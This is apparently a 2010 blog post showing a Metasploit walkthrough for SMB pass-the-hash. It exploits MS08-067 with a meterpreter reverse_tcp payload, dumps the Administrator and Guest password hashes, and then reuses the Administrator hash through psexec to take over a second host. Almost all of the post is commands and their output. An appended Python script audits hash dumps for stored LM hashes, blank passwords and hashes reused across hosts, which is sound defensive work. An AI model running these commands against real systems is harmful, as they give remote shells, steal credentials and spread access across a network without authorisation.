Thursday, May 13, 2010

SMB Pass the Hash

Step 1:
Get the hashes from the target machine (e.g. LON-DC1 = 192.168.1.200):
msf > use windows/smb/ms08_067_netapi
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set RHOST 192.168.1.200
msf > set LHOST 192.168.1.252
msf > set LPORT 443
msf > set TARGET 7
msf > exploit

meterpreter > run hashdump

Administrator:500:921988ba001dc8e14a3b108f3fa6cb6d:e19ccf75ee54e06b06a5907af13cef42:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Step 2:
Copy the hash, then pass the hash using psexec:

msf > use windows/smb/psexec
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set RHOST 192.168.1.110
msf > set LHOST 192.168.1.252
msf > set LPORT 6666
msf > set SMBUser Administrator
msf > set SMBPass 921988ba001dc8e14a3b108f3fa6cb6d:e19ccf75ee54e06b06a5907af13cef42
msf > exploit
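
Added example (not part of the original post): a defender-side audit of dumps in the user:rid:lm:nt::: format shown in Step 1. It flags accounts that still store an LM hash, accounts with a blank password, and NT hashes shared between hosts, which is the condition that lets the hash from one machine authenticate to another in Step 2. The 192.168.1.110 lines are constructed on the assumption that it uses the same local Administrator password; the function names are hypothetical.

```python
from collections import defaultdict

# Well-known constants: hashes of the empty password. An LM field equal to
# EMPTY_LM also means no usable LM hash is stored for the account.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# The two lines are the hashdump output shown in the post.
POST_LINES = """\
Administrator:500:921988ba001dc8e14a3b108f3fa6cb6d:e19ccf75ee54e06b06a5907af13cef42:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""
# Constructed sample: the second host's dump is an assumption (same passwords).
DUMPS = {"192.168.1.200": POST_LINES, "192.168.1.110": POST_LINES}

def parse_dump(text):
    """Yield (user, rid, lm, nt) per well-formed line; skip anything else."""
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        lm, nt = parts[2].lower(), parts[3].lower()
        if len(lm) == 32 and len(nt) == 32:
            yield parts[0], int(parts[1]), lm, nt

def audit(dumps):
    """Return a list of (finding, hosts, users) tuples for the given dumps."""
    findings, seen = [], defaultdict(set)
    for host, text in dumps.items():
        for user, _rid, lm, nt in parse_dump(text):
            if lm != EMPTY_LM:
                findings.append(("lm_hash_stored", host, user))
            if nt == EMPTY_NT:
                findings.append(("blank_password", host, user))
            else:
                seen[nt].add((host, user))
    # The same NT hash on more than one host means one dump unlocks the others.
    for accounts in seen.values():
        hosts = sorted({h for h, _ in accounts})
        users = sorted({u for _, u in accounts})
        if len(hosts) > 1:
            findings.append(("hash_reused", ",".join(hosts), ",".join(users)))
    return findings

if __name__ == "__main__":
    for finding in audit(DUMPS):
        print(finding)
```

Each hash_reused finding is a candidate for unique per-host local administrator passwords; each lm_hash_stored finding means LM hash storage is still enabled for that account.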
